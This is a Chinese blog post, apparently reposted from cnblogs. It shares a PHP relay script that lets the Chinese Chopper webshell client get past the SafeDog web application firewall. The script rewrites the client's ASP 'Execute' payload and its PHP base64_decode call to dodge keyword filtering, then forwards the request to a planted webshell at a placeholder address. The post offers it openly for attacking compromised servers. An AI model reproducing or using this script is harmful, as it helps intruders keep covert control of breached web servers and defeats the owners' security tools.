zoukankan      html  css  js  c++  java
  • 菜刀轻松砍杀安全狗 asp一句话中转脚本

    看到很多朋友看了我的PHP中转脚本http://phpinfo.me/2014/02/01/309.html

    ,问我那个脚本只能中转PHP的,但是asp的呢

    asp连接的时候安全狗拦截的正是菜刀POST里的eval("Ex"%26cHr(101)%26"cute关键字,

    那么只需替换下,替换成eval("Ex"%26cHr(101)%26cHr(99)%26"ute即可秒杀之

    于是有了如下中转脚本

    <?php
     
    /******************************
     
    fuck SafeDog
     
    如果是asp的一句话那么菜刀连接的时候,地址要这样填:
     
    http://127.0.0.1/bypass.php?type=asp
     
    最后三个字母必须是asp不然菜刀会提示脚本类型选择错误...
     
    *****************************/
     
    $webshell="http://xxoo.com/data/%23data.asp";//把这里改成你的shell地址
    $webshell=$webshell."?&1141056911=base64_decode";
    $da=$_POST;
    $data = $da;
    @$data=str_replace("base64_decode",'$_GET[1141056911]',$data); //PHP杀狗
     $data = http_build_query($data);  
     
    //asp杀狗
     @$data=str_replace('eval%28%22Ex%22%26cHr%28101%29%26%22cute','eval%28%22Ex%22%26cHr%28101%29%26cHr%2899%29%26%22ute',$data);
    echo $data;
    $opts = array (  
    'http' => array (  
    'method' => 'POST',  
    'header'=> "Content-type: application/x-www-form-urlencoded
    " .  
    "Content-Length: " . strlen($data) . "
    ",  
    'content' => $data)
    );
     
    $context = stream_context_create($opts);  
    $html = @file_get_contents($webshell, false, $context); //发送post 
    echo $html;  
     
    ?>
    

     asp连接的时候要像这样

    有时候安全狗只是个摆设

  • 相关阅读:
    Python(2.7.6) 特殊方法
    Python(2.7.6) 列表推导式
    代码神注释鉴赏,喜欢拿去用
    为什么说重启能解决90%的问题
    为什么说重启能解决90%的问题
    编程语言简史
    编程语言简史
    Shell脚本中循环select命令用法笔记
    程序员职业规划
    程序员职业规划
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4056038.html
Copyright © 2011-2022 走看看